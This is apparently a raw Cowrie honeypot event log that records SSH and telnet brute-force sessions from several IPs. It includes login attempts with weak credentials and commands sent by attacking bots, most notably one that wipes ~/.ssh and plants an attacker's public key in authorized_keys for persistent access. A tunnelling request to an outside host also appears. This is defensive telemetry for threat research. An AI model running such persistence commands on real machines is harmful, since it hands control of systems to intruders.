{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48184,"dst_ip":"1.2.3.4","dst_port":23,"session":"5402014d073f","protocol":"telnet","message":"New connection: 212.227.125.160:48184 (1.2.3.4:23) [session: 5402014d073f]","sensor":"my-vps","timestamp":"2025-08-26T15:51:31.463439Z"}
{"eventid":"cowrie.session.closed","duration":7.825640439987183,"message":"Connection lost after 7 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:51:39.289010Z","src_ip":"212.227.125.160","session":"5402014d073f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37168,"dst_ip":"1.2.3.4","dst_port":23,"session":"36d7d153183e","protocol":"telnet","message":"New connection: 212.227.125.160:37168 (1.2.3.4:23) [session: 36d7d153183e]","sensor":"my-vps","timestamp":"2025-08-26T15:51:52.595834Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49648,"dst_ip":"1.2.3.4","dst_port":22,"session":"9741df9a9db7","protocol":"ssh","message":"New connection: 212.227.125.160:49648 (1.2.3.4:22) [session: 9741df9a9db7]","sensor":"my-vps","timestamp":"2025-08-26T15:52:25.238492Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T15:52:25.239702Z","src_ip":"212.227.125.160","session":"9741df9a9db7"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T15:52:25.459724Z","src_ip":"212.227.125.160","session":"9741df9a9db7"}
{"eventid":"cowrie.login.success","username":"root","password":" ","message":"login attempt [root/ ] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:52:26.121673Z","src_ip":"212.227.125.160","session":"9741df9a9db7"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:52:26.342156Z","src_ip":"212.227.125.160","session":"9741df9a9db7"}
{"eventid":"cowrie.session.closed","duration":34.15466547012329,"message":"Connection lost after 34 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:52:26.750426Z","src_ip":"212.227.125.160","session":"36d7d153183e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44388,"dst_ip":"1.2.3.4","dst_port":23,"session":"77b275652746","protocol":"telnet","message":"New connection: 212.227.125.160:44388 (1.2.3.4:23) [session: 77b275652746]","sensor":"my-vps","timestamp":"2025-08-26T15:52:29.033686Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":20127,"dst_ip":"1.2.3.4","dst_port":22,"session":"a56535d8a689","protocol":"ssh","message":"New connection: 212.227.235.229:20127 (1.2.3.4:22) [session: a56535d8a689]","sensor":"my-vps","timestamp":"2025-08-26T15:52:35.819547Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T15:52:35.975386Z","src_ip":"212.227.235.229","session":"a56535d8a689"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T15:52:36.156783Z","src_ip":"212.227.235.229","session":"a56535d8a689"}
{"eventid":"cowrie.login.success","username":"root","password":"1","message":"login attempt [root/1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:52:37.371136Z","src_ip":"212.227.235.229","session":"a56535d8a689"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:52:37.743904Z","src_ip":"212.227.235.229","session":"a56535d8a689"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-26T15:52:37.744609Z","src_ip":"212.227.235.229","session":"a56535d8a689"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:52:37.907076Z","src_ip":"212.227.235.229","session":"a56535d8a689"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:52:37.908499Z","src_ip":"212.227.235.229","session":"a56535d8a689"}
{"eventid":"cowrie.session.connect","src_ip":"193.32.162.145","src_port":54644,"dst_ip":"1.2.3.4","dst_port":22,"session":"23dfd3baadf1","protocol":"ssh","message":"New connection: 193.32.162.145:54644 (1.2.3.4:22) [session: 23dfd3baadf1]","sensor":"my-vps","timestamp":"2025-08-26T15:52:42.373047Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T15:52:42.374003Z","src_ip":"193.32.162.145","session":"23dfd3baadf1"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T15:52:42.403883Z","src_ip":"193.32.162.145","session":"23dfd3baadf1"}
{"eventid":"cowrie.login.failed","username":"trading","password":"trading","message":"login attempt [trading/trading] failed","sensor":"my-vps","timestamp":"2025-08-26T15:52:42.495702Z","src_ip":"193.32.162.145","session":"23dfd3baadf1"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:52:43.528505Z","src_ip":"193.32.162.145","session":"23dfd3baadf1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39828,"dst_ip":"1.2.3.4","dst_port":22,"session":"f78b0bb89ff5","protocol":"ssh","message":"New connection: 212.227.235.229:39828 (1.2.3.4:22) [session: f78b0bb89ff5]","sensor":"my-vps","timestamp":"2025-08-26T15:52:46.266037Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T15:52:46.457255Z","src_ip":"212.227.235.229","session":"f78b0bb89ff5"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T15:52:46.515894Z","src_ip":"212.227.235.229","session":"f78b0bb89ff5"}
{"eventid":"cowrie.login.success","username":"root","password":" ","message":"login attempt [root/ ] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:52:47.514375Z","src_ip":"212.227.235.229","session":"f78b0bb89ff5"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:52:47.765363Z","src_ip":"212.227.235.229","session":"f78b0bb89ff5"}
{"eventid":"cowrie.session.closed","duration":30.419968605041504,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:52:59.453589Z","src_ip":"212.227.125.160","session":"77b275652746"}
{"eventid":"cowrie.session.connect","src_ip":"103.193.178.248","src_port":39674,"dst_ip":"1.2.3.4","dst_port":22,"session":"884a6a3e9a5c","protocol":"ssh","message":"New connection: 103.193.178.248:39674 (1.2.3.4:22) [session: 884a6a3e9a5c]","sensor":"my-vps","timestamp":"2025-08-26T15:53:20.092659Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T15:53:20.093563Z","src_ip":"103.193.178.248","session":"884a6a3e9a5c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T15:53:20.360805Z","src_ip":"103.193.178.248","session":"884a6a3e9a5c"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa112211","message":"login attempt [root/Aa112211] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:53:21.464645Z","src_ip":"103.193.178.248","session":"884a6a3e9a5c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":17859,"dst_ip":"1.2.3.4","dst_port":22,"session":"5552e47e3f81","protocol":"ssh","message":"New connection: 212.227.125.160:17859 (1.2.3.4:22) [session: 5552e47e3f81]","sensor":"my-vps","timestamp":"2025-08-26T15:53:22.076981Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:53:22.077974Z","src_ip":"212.227.125.160","session":"5552e47e3f81"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":18104,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d84b919c88a","protocol":"ssh","message":"New connection: 212.227.125.160:18104 (1.2.3.4:22) [session: 8d84b919c88a]","sensor":"my-vps","timestamp":"2025-08-26T15:53:22.188853Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T15:53:22.189929Z","src_ip":"212.227.125.160","session":"8d84b919c88a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:53:22.354198Z","src_ip":"103.193.178.248","session":"884a6a3e9a5c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T15:53:22.354969Z","src_ip":"103.193.178.248","session":"884a6a3e9a5c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T15:53:22.356094Z","src_ip":"103.193.178.248","session":"884a6a3e9a5c"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T15:53:22.357386Z","src_ip":"212.227.125.160","session":"8d84b919c88a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:53:22.623487Z","src_ip":"103.193.178.248","session":"884a6a3e9a5c"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:53:22.696253Z","src_ip":"212.227.125.160","session":"8d84b919c88a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T15:53:22.809658Z","session":"8d84b919c88a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:53:23.210780Z","src_ip":"103.193.178.248","session":"884a6a3e9a5c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T15:53:23.211517Z","src_ip":"103.193.178.248","session":"884a6a3e9a5c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T15:53:23.479275Z","src_ip":"103.193.178.248","session":"884a6a3e9a5c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:53:23.480281Z","src_ip":"103.193.178.248","session":"884a6a3e9a5c"}
{"eventid":"cowrie.session.connect","src_ip":"103.193.178.248","src_port":39692,"dst_ip":"1.2.3.4","dst_port":22,"session":"88be11cbfff6","protocol":"ssh","message":"New connection: 103.193.178.248:39692 (1.2.3.4:22) [session: 88be11cbfff6]","sensor":"my-vps","timestamp":"2025-08-26T15:53:23.745226Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T15:53:23.745904Z","src_ip":"103.193.178.248","session":"88be11cbfff6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T15:53:24.011224Z","src_ip":"103.193.178.248","session":"88be11cbfff6"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T15:53:25.509470Z","src_ip":"103.193.178.248","session":"88be11cbfff6"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:53:26.776395Z","src_ip":"103.193.178.248","session":"88be11cbfff6"}
{"eventid":"cowrie.session.connect","src_ip":"103.193.178.248","src_port":42264,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce7cf087acef","protocol":"ssh","message":"New connection: 103.193.178.248:42264 (1.2.3.4:22) [session: ce7cf087acef]","sensor":"my-vps","timestamp":"2025-08-26T15:53:27.217976Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T15:53:27.219041Z","src_ip":"103.193.178.248","session":"ce7cf087acef"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac